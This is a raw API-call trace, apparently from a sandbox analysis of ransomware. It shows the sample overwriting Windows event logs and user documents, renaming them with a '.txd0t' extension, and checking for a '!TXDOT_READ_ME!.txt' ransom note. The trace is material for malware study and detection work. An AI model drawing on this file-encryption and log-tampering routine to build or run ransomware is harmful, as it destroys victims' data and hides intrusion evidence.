[0089.611] GetProcessHeap () returned 0xe30000 [0089.611] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed4530 | out: hHeap=0xe30000) returned 1 [0089.611] CloseHandle (hObject=0x478) returned 1 [0089.611] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4operational.evtx.txd0t")) returned 1 [0089.611] SetEvent (hEvent=0x40c) returned 1 [0089.611] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0089.615] StrCpyW (in: psz1=0x4a9f730, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx" [0089.615] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx.txd0t" [0089.615] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx.txd0t") returned 0 [0089.615] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx", dwFileAttributes=0x80) returned 1 [0089.615] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-winlogon%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x464 [0089.615] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=69632) returned 1 [0089.615] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.615] WriteFile (in: hFile=0x464, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0089.616] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.616] ReadFile (in: hFile=0x464, lpBuffer=0x415b020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x4a9f6f0, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f6f0*=0x11000, lpOverlapped=0x0) returned 1 [0089.622] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.622] WriteFile (in: hFile=0x464, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x4a9f6f4, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f6f4*=0x11000, lpOverlapped=0x0) returned 1 [0089.623] FlushFileBuffers (hFile=0x464) returned 1 [0089.627] GetProcessHeap () returned 0xe30000 [0089.627] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x118) returned 0xed1330 [0089.627] StrCpyW (in: psz1=0xed1330, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx" [0089.627] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx") returned="Microsoft-Windows-Winlogon%4Operational.evtx" [0089.627] StrCpyW (in: psz1=0xed1348, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.627] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.627] GetProcessHeap () returned 0xe30000 [0089.627] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed1330 | out: hHeap=0xe30000) returned 1 [0089.627] CloseHandle (hObject=0x464) returned 1 [0089.627] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-winlogon%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-winlogon%4operational.evtx.txd0t")) returned 1 [0089.628] SetEvent (hEvent=0x40c) returned 1 [0089.628] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0089.630] StrCpyW (in: psz1=0x4a9f730, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx" [0089.630] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx.txd0t" [0089.630] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx.txd0t") returned 0 [0089.630] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx", dwFileAttributes=0x80) returned 1 [0089.631] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wmi-activity%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0089.631] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=1052672) returned 1 [0089.631] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.631] WriteFile (in: hFile=0x474, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0089.632] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffefee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.632] ReadFile (in: hFile=0x474, lpBuffer=0x415b020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x4a9f6f0, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f6f0*=0x100000, lpOverlapped=0x0) returned 1 [0089.660] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.660] WriteFile (in: hFile=0x474, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x4a9f6f4, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f6f4*=0x100000, lpOverlapped=0x0) returned 1 [0089.664] FlushFileBuffers (hFile=0x474) returned 1 [0090.089] GetProcessHeap () returned 0xe30000 [0090.089] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x120) returned 0xed7f88 [0090.089] StrCpyW (in: psz1=0xed7f88, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx" [0090.089] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx") returned="Microsoft-Windows-WMI-Activity%4Operational.evtx" [0090.089] StrCpyW (in: psz1=0xed7fa0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0090.090] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0090.090] GetProcessHeap () returned 0xe30000 [0090.090] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed7f88 | out: hHeap=0xe30000) returned 1 [0090.090] CloseHandle (hObject=0x474) returned 1 [0090.090] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wmi-activity%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-wmi-activity%4operational.evtx.txd0t")) returned 1 [0090.090] SetEvent (hEvent=0x40c) returned 1 [0090.091] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0091.098] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0092.098] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0093.120] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0094.141] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0095.183] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0096.246] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0097.247] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0098.279] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0099.374] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0100.437] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0101.518] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0103.202] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0104.405] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0105.724] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0107.499] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0108.724] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0110.706] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0114.067] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0116.261] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0117.557] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0119.091] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0120.100] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0121.105] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0122.121] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0123.136] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0124.195] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0125.277] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0126.294] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0127.309] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0128.722] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0129.797] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0130.812] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0131.845] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0132.999] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0134.501] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0137.982] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0139.144] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0140.552] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0141.555] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0142.570] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0143.615] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0144.716] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) Thread: id = 14 os_tid = 0xee4 [0070.753] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0071.817] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0072.151] StrCpyW (in: psz1=0x53ef7a0, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\5hVk52ujjP2vb7epC7.xls" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\5hVk52ujjP2vb7epC7.xls") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\5hVk52ujjP2vb7epC7.xls" [0072.151] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\5hVk52ujjP2vb7epC7.xls", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\5hVk52ujjP2vb7epC7.xls.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\5hVk52ujjP2vb7epC7.xls.txd0t" [0072.151] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\5hVk52ujjP2vb7epC7.xls.txd0t") returned 0 [0072.151] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\5hVk52ujjP2vb7epC7.xls", dwFileAttributes=0x80) returned 1 [0072.151] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\5hVk52ujjP2vb7epC7.xls" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\5hvk52ujjp2vb7epc7.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0072.151] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=52045) returned 1 [0072.152] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.152] WriteFile (in: hFile=0x474, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0072.152] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffff32b3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.152] ReadFile (in: hFile=0x474, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0xcb40, lpNumberOfBytesRead=0x53ef760, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef760*=0xcb40, lpOverlapped=0x0) returned 1 [0072.156] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffff34c0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.156] WriteFile (in: hFile=0x474, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0xcb40, lpNumberOfBytesWritten=0x53ef764, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef764*=0xcb40, lpOverlapped=0x0) returned 1 [0072.156] FlushFileBuffers (hFile=0x474) returned 1 [0072.169] GetProcessHeap () returned 0xe30000 [0072.169] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x11c) returned 0xeca148 [0072.169] StrCpyW (in: psz1=0xeca148, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\5hVk52ujjP2vb7epC7.xls" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\5hVk52ujjP2vb7epC7.xls") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\5hVk52ujjP2vb7epC7.xls" [0072.169] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\5hVk52ujjP2vb7epC7.xls") returned="5hVk52ujjP2vb7epC7.xls" [0072.169] StrCpyW (in: psz1=0xeca190, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.169] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\!TXDOT_READ_ME!.txt") returned 1 [0072.184] GetProcessHeap () returned 0xe30000 [0072.184] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xeca148 | out: hHeap=0xe30000) returned 1 [0072.184] CloseHandle (hObject=0x474) returned 1 [0072.187] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\5hVk52ujjP2vb7epC7.xls" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\5hvk52ujjp2vb7epc7.xls"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\5hVk52ujjP2vb7epC7.xls.txd0t" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\5hvk52ujjp2vb7epc7.xls.txd0t")) returned 1 [0072.187] SetEvent (hEvent=0x414) returned 1 [0072.187] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0072.191] StrCpyW (in: psz1=0x53ef7b0, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\8zg7I2Esm.docx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\8zg7I2Esm.docx") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\8zg7I2Esm.docx" [0072.192] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\8zg7I2Esm.docx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\8zg7I2Esm.docx.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\8zg7I2Esm.docx.txd0t" [0072.192] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\8zg7I2Esm.docx.txd0t") returned 0 [0072.192] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\8zg7I2Esm.docx", dwFileAttributes=0x80) returned 1 [0072.192] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\8zg7I2Esm.docx" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\8zg7i2esm.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0072.192] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=9023) returned 1 [0072.192] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.193] WriteFile (in: hFile=0x474, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0072.193] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffffdac1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.193] ReadFile (in: hFile=0x474, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x2330, lpNumberOfBytesRead=0x53ef770, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef770*=0x2330, lpOverlapped=0x0) returned 1 [0072.193] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffffdcd0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.193] WriteFile (in: hFile=0x474, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x2330, lpNumberOfBytesWritten=0x53ef774, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef774*=0x2330, lpOverlapped=0x0) returned 1 [0072.193] FlushFileBuffers (hFile=0x474) returned 1 [0072.212] GetProcessHeap () returned 0xe30000 [0072.212] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x10c) returned 0xe9b648 [0072.212] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\8zg7I2Esm.docx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\8zg7I2Esm.docx") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\8zg7I2Esm.docx" [0072.212] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\8zg7I2Esm.docx") returned="8zg7I2Esm.docx" [0072.212] StrCpyW (in: psz1=0xe9b690, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.212] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\!TXDOT_READ_ME!.txt") returned 1 [0072.212] GetProcessHeap () returned 0xe30000 [0072.212] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0072.212] CloseHandle (hObject=0x474) returned 1 [0072.214] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\8zg7I2Esm.docx" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\8zg7i2esm.docx"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\8zg7I2Esm.docx.txd0t" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\8zg7i2esm.docx.txd0t")) returned 1 [0072.215] SetEvent (hEvent=0x414) returned 1 [0072.215] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0072.224] StrCpyW (in: psz1=0x53ef7b0, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\CjrpV8NWiwYR.png" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\CjrpV8NWiwYR.png") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\CjrpV8NWiwYR.png" [0072.224] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\CjrpV8NWiwYR.png", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\CjrpV8NWiwYR.png.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\CjrpV8NWiwYR.png.txd0t" [0072.224] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\CjrpV8NWiwYR.png.txd0t") returned 0 [0072.225] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\CjrpV8NWiwYR.png", dwFileAttributes=0x80) returned 1 [0072.225] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\CjrpV8NWiwYR.png" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\cjrpv8nwiwyr.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x47c [0072.225] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=57548) returned 1 [0072.225] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.225] WriteFile (in: hFile=0x47c, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0072.225] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xffff1d34, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.225] ReadFile (in: hFile=0x47c, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0xe0c0, lpNumberOfBytesRead=0x53ef770, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef770*=0xe0c0, lpOverlapped=0x0) returned 1 [0072.227] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xffff1f40, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.227] WriteFile (in: hFile=0x47c, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0xe0c0, lpNumberOfBytesWritten=0x53ef774, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef774*=0xe0c0, lpOverlapped=0x0) returned 1 [0072.227] FlushFileBuffers (hFile=0x47c) returned 1 [0072.248] GetProcessHeap () returned 0xe30000 [0072.248] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x110) returned 0xe9b648 [0072.248] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\CjrpV8NWiwYR.png" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\CjrpV8NWiwYR.png") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\CjrpV8NWiwYR.png" [0072.248] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\CjrpV8NWiwYR.png") returned="CjrpV8NWiwYR.png" [0072.249] StrCpyW (in: psz1=0xe9b690, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.249] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\!TXDOT_READ_ME!.txt") returned 1 [0072.249] GetProcessHeap () returned 0xe30000 [0072.249] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0072.249] CloseHandle (hObject=0x47c) returned 1 [0072.251] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\CjrpV8NWiwYR.png" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\cjrpv8nwiwyr.png"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\CjrpV8NWiwYR.png.txd0t" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\cjrpv8nwiwyr.png.txd0t")) returned 1 [0072.251] SetEvent (hEvent=0x414) returned 1 [0072.251] WaitForSingleObject 